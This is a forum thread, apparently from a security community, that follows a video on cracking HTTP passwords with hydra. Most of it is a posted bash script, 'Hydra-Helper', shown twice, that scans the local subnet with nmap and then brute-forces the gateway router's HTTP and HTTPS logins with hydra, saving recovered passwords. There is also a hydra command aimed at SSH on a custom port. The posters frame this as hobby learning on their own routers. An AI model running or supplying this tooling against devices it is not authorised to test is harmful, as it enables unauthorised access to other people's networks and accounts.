[Video] How to: Crack HTTP passwords (hydra)

[tyl3rs123]

Great Post...well put..good info on that

[g0tmi1k]

What do you mean by 'basic.auth'? User is authenticated by a password.
Index page isn't protected in any way. Connection goes through http. SSL is not used.

basic.auth
If the index page isn't protect, try targeting another page that is!

Great Post...well put..good info on that

Thanks for the thanks!

[rportnoy]

Nice, but how can we set port i.e: I'm setting my sshd to listen to port 1234 and and disable root access

[g0tmi1k]

Nice, but how can we set port i.e: I'm setting my sshd to listen to port 1234 and and disable root access

-s PORT if the service is on a different default port, define it here

I THINK it would look something like...

Code:

./hydra  -l rportnoy -P /path/to/file.lst -e ns -f -s 1234 -vV ssh2

[mamece2]

i dont like when passwords are gibberish

[g0tmi1k]

i dont like when passwords are gibberish

Everything has an upside & downside
Yes, when passwords are gibberish, doing a dictionary attack is alot harder...HOWEVER
If it's hard for you to do it, it means it's hard for someone to do it to you

[Scamentology]

I threw together a script for myself when I saw this. It might be useful to someone else.

#/bin/bash echo "######### - Hydra-Helper - MfJipfVz - Pastebin.com

Any feedback would be appreciated. maybe an improvement? Its pretty simple but effective so far.

[g0tmi1k]

I threw together a script for myself when I saw this. It might be useful to someone else.

#/bin/bash echo "######### - Hydra-Helper - MfJipfVz - Pastebin.com

Any feedback would be appreciated. maybe an improvement? Its pretty simple but effective so far.

Thanks for sharing Scamentology.
I haven't be able to test it - but doing a quick once over - *some* index pages are not protected, all the other pages are. (Seen this on two routers - gives "guests" a brief overview of the network - then you need to login to do anything else...)

[Scamentology]

Here's is the update if anyone wants it.

Pastebin was down for me. soooo...

Code:

#/bin/bash
echo "#####################################"
echo "   Welcome to Hydra-Helper v$version"
echo "    Automated password cracker"
echo " (C)opyright 2010 - Scamentology"
echo "#####################################"
echo "check /root/recovered.lst for results"
echo "#####################################"
#######################################
# (C)opyright 2010 - Scamentology                                                              #
#---License------------------------------------------------------------------------------------#
#  This program is free software: you can redistribute it and/or modify it under the terms     #
#  of the GNU General Public License as published by the Free Software Foundation, either      #
#  version 3 of the License, or (at your option) any later version.                            #
#                                                                                              #
#  This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;   #
#  without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.   #
#  See the GNU General Public License for more details.                                        #
#                                                                                              #
#  You should have received a copy of the GNU General Public License along with this program.  #
#  If not, see <http://www.gnu.org/licenses/>
#----------------------------------------------------------------------------------------------#
#This is my first stab at a shell script so don't be rude.
#It was tested on the following routers
#--Linksys WRT54G
#--airlink-101
#--Does not work on JAVA based routers (I gave up on that) You will just get everything as a valid pair.
#Instructions
#You will need to give the path to you password list then run the script
#---------------------------------------------------------------------------------------------------------------------#
#Must have Nmap and Hydra installed; Tested on Backtrack 4 R1
version=0.4
#---------------------------------------------------------------------------------------------------------------------------------#
                         dictpath=/root/pass.lst
                         userpath=/root/user.lst
                          logfile=/tmp/logfile.lst
#
#
#
if [ ! -e "/usr/bin/nmap" ] ; then
   echo "Nmap is not installed."
   read -p ">> Would you like to try and install it? [Y/n]: " -n 1
   if [[ "$REPLY" =~ ^[Yy]$ ]] ; then action "Install Nmap" "apt-get -y install nmap" ; fi
   if [ ! -e "/usr/share/nmap/nmap-services" ] ; then
      echo "Failed to install Nmap"
   else
      display info "Installed: Nmap"
   fi
fi
if [ ! -e "/usr/bin/hydra" ] ; then
   echo "Hydra is not installed."
   read -p ">> Would you like to try and install it? [Y/n]: " -n 1
   if [[ "$REPLY" =~ ^[Yy]$ ]] ; then action "Install Hydra" "apt-get -y install hydra" ; fi
   if [ ! -e "/usr/bin/hydra" ] ; then
      echo "Failed to install Hydra"
   else
      display info "Installed: Hydra"
   fi
fi
echo "Nmap and Hydra are installed. Lets continue..."
IP=$(ip route | grep default | awk '{ print $3}')                                           #Gives us The Gateway IP address
smb=""
https=""
ftp=""
telnet=""
echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
echo "Finding Alive Hosts and Scanning them"
echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
nmap=$(nmap -oG /tmp/nmap.lst -Pn $IP/24)                                                       #Tells us what ports are open.
smb=$(grep '139/open' /tmp/nmap.lst | awk '{ print $2}')
if [ "$smb" == "" ]; then echo "No Open File Shares" ; fi
   if [ "$smb" != "" ]; then grep '139/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/smb.lst ; fi    
http=$(grep '80/open' /tmp/nmap.lst | awk '{ print $2}')
if [ "$http" == "" ]; then echo "No HTTP Servers" ; fi
   if [ "$http" != "" ]; then grep '80/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/http.lst ; fi
https=$(grep '443/open' /tmp/nmap.lst | awk '{ print $2}')
if [ "$https" == "" ]; then echo "No HTTPS Servers" ; fi
   if [ "$https" != "" ]; then grep '443/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/https.lst ; fi
ftp=$(grep '21/open' /tmp/nmap.lst | awk '{ print $2}')
if [ "$ftp" == "" ]; then echo "No FTP Servers" ; fi
   if [ "$ftp" != "" ]; then grep '21/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/https.lst ; fi
telnet=$(grep '23/open' /tmp/nmap.lst | awk '{ print $2}')
if [ "$telnet" == "" ]; then echo "No Telnet Servers" ; fi
   if [ "$telnet" != "" ]; then grep '23/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/telnet.lst ; fi
#---------------------------------------------------------------------------------------------------------------------#
#
#Router Password Guesser
######################################
username=/root/Hydra/user.lst
dictpath=/root/Hydra/pass.lst
tasks=15
######################################
if [ -e "/tmp/http.lst" ] ; then
echo "<<<<<<<<<>>>>>>>>>>>"
echo "Attacking on Port 80"
echo "<<<<<<<<<>>>>>>>>>>>"
xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking Router" -e "hydra -L $username -P $dictpath -e n -e s -t $tasks -f -w 15 -v $IP http-get / -o /tmp/tmp.lst" 
grep 'password' /tmp/tmp.lst >> /tmp/rec1.lst
   if [ -e "/tmp/rec1.lst" ] ; then grep 'password' /tmp/tmp.lst >> /tmp/rec1.lst ; fi
   if [ ! -e "/tmp/rec1.lst" ] ; then echo "HTTP Attack Failed" >> $logfile ; fi
      #rm /tmp/tmp.lst /tmp/rec1.lst 2>/dev/null
fi
if [ -e "/tmp/https.lst" ] ; then
echo "<<<<<<<<<>>>>>>>>>>>>"
echo "Attacking on Port 443"
echo "<<<<<<<<<>>>>>>>>>>>>"
xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking Router" -e "hydra -L $username -P $dictpath -S -e n -e s -t $tasks -f -w 15 -v $IP https-get / -o /tmp/tmp2.lst" 
grep 'password' /tmp/tmp2.lst >> /tmp/rec2.lst
   if [ -e "/tmp/rec2.lst" ] ; then grep 'password' /tmp/tmp2.lst >> /tmp/rec2.lst ; fi
   if [ ! -e "/tmp/rec2.lst" ] ; then echo "HTTPS Attack Failed" >> $logfile ; fi
      #rm /tmp/tmp.lst /tmp/rec2.lst 2>/dev/null
fi
###############
#insert removed code here (therest.lst)
###############
#
sleep 5
killall xterm 2>/dev/null
#---------------------------------------------------------------------------------------------------------------------#
#
#
if [ ! -e "/tmp/rec1.lst" ] ; then
   echo "No HTTP passwords found" ; fi
if [ -e "/tmp/rec1.lst" ] ; then
   grep 'password' /tmp/rec1.lst >> /root/recovered.lst 2>/dev/null ; fi
if [ ! -e "/tmp/rec2.lst" ] ; then
   echo "No HTTPS passwords found" ; fi
if [ -e "/tmp/rec2.lst" ] ; then
   grep 'password' /tmp/rec2.lst >> /root/recovered.lst 2>/dev/null ; fi
if [ ! -e "/root/recovered.lst" ] ; then 
   echo "No passwords recovered" ; fi
cat $logfile 2>/dev/null
cat /root/recovered.lst
#cleanup...
rm /tmp/rec2.lst /tmp/rec3.lst /tmp/http.lst /tmp/https.lst /tmp/smb.lst /tmp/telnet.lst /tmp/ftp.lst /tmp/nmap.lst /tmp/rec5.lst /media/disk/mine/ISO/tools/hydra.restore 2>/dev/null
exit
#
#
#
#todo
#match IP addresses to passwords in /root/recovered.lst
#add errors for missing stuff
#add ssl support
#add interupt and cleanup
#add nmap options
#add auto time and date to details
#add scan to detect router brand and customize attack

I have improved the script and have and added support for both http and https

it works pretty flawlessly on my linksys wrt54g and my airlink 101 but wont work on the dlink that uses java.

I will be adding ftp and smb support next

Thanks. This is a learning experience for me so I'm doing this for fun..
I know there are other tools that do this but I wanted to automate it as much as possible and improve my shell scripting (which sucks as of now).

I seem to be addicted to this.

[g0tmi1k]

Here's is the update if anyone wants it.

Pastebin was down for me. soooo...

Code:

#/bin/bash
echo "#####################################"
echo "   Welcome to Hydra-Helper v$version"
echo "    Automated password cracker"
echo " (C)opyright 2010 - Scamentology"
echo "#####################################"
echo "check /root/recovered.lst for results"
echo "#####################################"
#######################################
# (C)opyright 2010 - Scamentology                                                              #
#---License------------------------------------------------------------------------------------#
#  This program is free software: you can redistribute it and/or modify it under the terms     #
#  of the GNU General Public License as published by the Free Software Foundation, either      #
#  version 3 of the License, or (at your option) any later version.                            #
#                                                                                              #
#  This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;   #
#  without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.   #
#  See the GNU General Public License for more details.                                        #
#                                                                                              #
#  You should have received a copy of the GNU General Public License along with this program.  #
#  If not, see <http://www.gnu.org/licenses/>
#----------------------------------------------------------------------------------------------#
#This is my first stab at a shell script so don't be rude.
#It was tested on the following routers
#--Linksys WRT54G
#--airlink-101
#--Does not work on JAVA based routers (I gave up on that) You will just get everything as a valid pair.
#Instructions
#You will need to give the path to you password list then run the script
#---------------------------------------------------------------------------------------------------------------------#
#Must have Nmap and Hydra installed; Tested on Backtrack 4 R1
version=0.4
#---------------------------------------------------------------------------------------------------------------------------------#
                         dictpath=/root/pass.lst
                         userpath=/root/user.lst
                          logfile=/tmp/logfile.lst
#
#
#
if [ ! -e "/usr/bin/nmap" ] ; then
   echo "Nmap is not installed."
   read -p ">> Would you like to try and install it? [Y/n]: " -n 1
   if [[ "$REPLY" =~ ^[Yy]$ ]] ; then action "Install Nmap" "apt-get -y install nmap" ; fi
   if [ ! -e "/usr/share/nmap/nmap-services" ] ; then
      echo "Failed to install Nmap"
   else
      display info "Installed: Nmap"
   fi
fi
if [ ! -e "/usr/bin/hydra" ] ; then
   echo "Hydra is not installed."
   read -p ">> Would you like to try and install it? [Y/n]: " -n 1
   if [[ "$REPLY" =~ ^[Yy]$ ]] ; then action "Install Hydra" "apt-get -y install hydra" ; fi
   if [ ! -e "/usr/bin/hydra" ] ; then
      echo "Failed to install Hydra"
   else
      display info "Installed: Hydra"
   fi
fi
echo "Nmap and Hydra are installed. Lets continue..."
IP=$(ip route | grep default | awk '{ print $3}')                                           #Gives us The Gateway IP address
smb=""
https=""
ftp=""
telnet=""
echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
echo "Finding Alive Hosts and Scanning them"
echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
nmap=$(nmap -oG /tmp/nmap.lst -Pn $IP/24)                                                       #Tells us what ports are open.
smb=$(grep '139/open' /tmp/nmap.lst | awk '{ print $2}')
if [ "$smb" == "" ]; then echo "No Open File Shares" ; fi
   if [ "$smb" != "" ]; then grep '139/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/smb.lst ; fi    
http=$(grep '80/open' /tmp/nmap.lst | awk '{ print $2}')
if [ "$http" == "" ]; then echo "No HTTP Servers" ; fi
   if [ "$http" != "" ]; then grep '80/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/http.lst ; fi
https=$(grep '443/open' /tmp/nmap.lst | awk '{ print $2}')
if [ "$https" == "" ]; then echo "No HTTPS Servers" ; fi
   if [ "$https" != "" ]; then grep '443/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/https.lst ; fi
ftp=$(grep '21/open' /tmp/nmap.lst | awk '{ print $2}')
if [ "$ftp" == "" ]; then echo "No FTP Servers" ; fi
   if [ "$ftp" != "" ]; then grep '21/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/https.lst ; fi
telnet=$(grep '23/open' /tmp/nmap.lst | awk '{ print $2}')
if [ "$telnet" == "" ]; then echo "No Telnet Servers" ; fi
   if [ "$telnet" != "" ]; then grep '23/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/telnet.lst ; fi
#---------------------------------------------------------------------------------------------------------------------#
#
#Router Password Guesser
######################################
username=/root/Hydra/user.lst
dictpath=/root/Hydra/pass.lst
tasks=15
######################################
if [ -e "/tmp/http.lst" ] ; then
echo "<<<<<<<<<>>>>>>>>>>>"
echo "Attacking on Port 80"
echo "<<<<<<<<<>>>>>>>>>>>"
xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking Router" -e "hydra -L $username -P $dictpath -e n -e s -t $tasks -f -w 15 -v $IP http-get / -o /tmp/tmp.lst" 
grep 'password' /tmp/tmp.lst >> /tmp/rec1.lst
   if [ -e "/tmp/rec1.lst" ] ; then grep 'password' /tmp/tmp.lst >> /tmp/rec1.lst ; fi
   if [ ! -e "/tmp/rec1.lst" ] ; then echo "HTTP Attack Failed" >> $logfile ; fi
      #rm /tmp/tmp.lst /tmp/rec1.lst 2>/dev/null
fi
if [ -e "/tmp/https.lst" ] ; then
echo "<<<<<<<<<>>>>>>>>>>>>"
echo "Attacking on Port 443"
echo "<<<<<<<<<>>>>>>>>>>>>"
xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking Router" -e "hydra -L $username -P $dictpath -S -e n -e s -t $tasks -f -w 15 -v $IP https-get / -o /tmp/tmp2.lst" 
grep 'password' /tmp/tmp2.lst >> /tmp/rec2.lst
   if [ -e "/tmp/rec2.lst" ] ; then grep 'password' /tmp/tmp2.lst >> /tmp/rec2.lst ; fi
   if [ ! -e "/tmp/rec2.lst" ] ; then echo "HTTPS Attack Failed" >> $logfile ; fi
      #rm /tmp/tmp.lst /tmp/rec2.lst 2>/dev/null
fi
###############
#insert removed code here (therest.lst)
###############
#
sleep 5
killall xterm 2>/dev/null
#---------------------------------------------------------------------------------------------------------------------#
#
#
if [ ! -e "/tmp/rec1.lst" ] ; then
   echo "No HTTP passwords found" ; fi
if [ -e "/tmp/rec1.lst" ] ; then
   grep 'password' /tmp/rec1.lst >> /root/recovered.lst 2>/dev/null ; fi
if [ ! -e "/tmp/rec2.lst" ] ; then
   echo "No HTTPS passwords found" ; fi
if [ -e "/tmp/rec2.lst" ] ; then
   grep 'password' /tmp/rec2.lst >> /root/recovered.lst 2>/dev/null ; fi
if [ ! -e "/root/recovered.lst" ] ; then 
   echo "No passwords recovered" ; fi
cat $logfile 2>/dev/null
cat /root/recovered.lst
#cleanup...
rm /tmp/rec2.lst /tmp/rec3.lst /tmp/http.lst /tmp/https.lst /tmp/smb.lst /tmp/telnet.lst /tmp/ftp.lst /tmp/nmap.lst /tmp/rec5.lst /media/disk/mine/ISO/tools/hydra.restore 2>/dev/null
exit
#
#
#
#todo
#match IP addresses to passwords in /root/recovered.lst
#add errors for missing stuff
#add ssl support
#add interupt and cleanup
#add nmap options
#add auto time and date to details
#add scan to detect router brand and customize attack

I have improved the script and have and added support for both http and https

it works pretty flawlessly on my linksys wrt54g and my airlink 101 but wont work on the dlink that uses java.

I will be adding ftp and smb support next

Thanks. This is a learning experience for me so I'm doing this for fun..
I know there are other tools that do this but I wanted to automate it as much as possible and improve my shell scripting (which sucks as of now).

I seem to be addicted to this.

Glad to see that your still working on it, still making updates for it
Start your own thread about it - more people will see it therefore you'll get more feedback on it! (=
hehe, I spotted a bit of my code in there (= Glad to know its been put to good use!
Yep, I understand what you mean - experience, addictive & fun.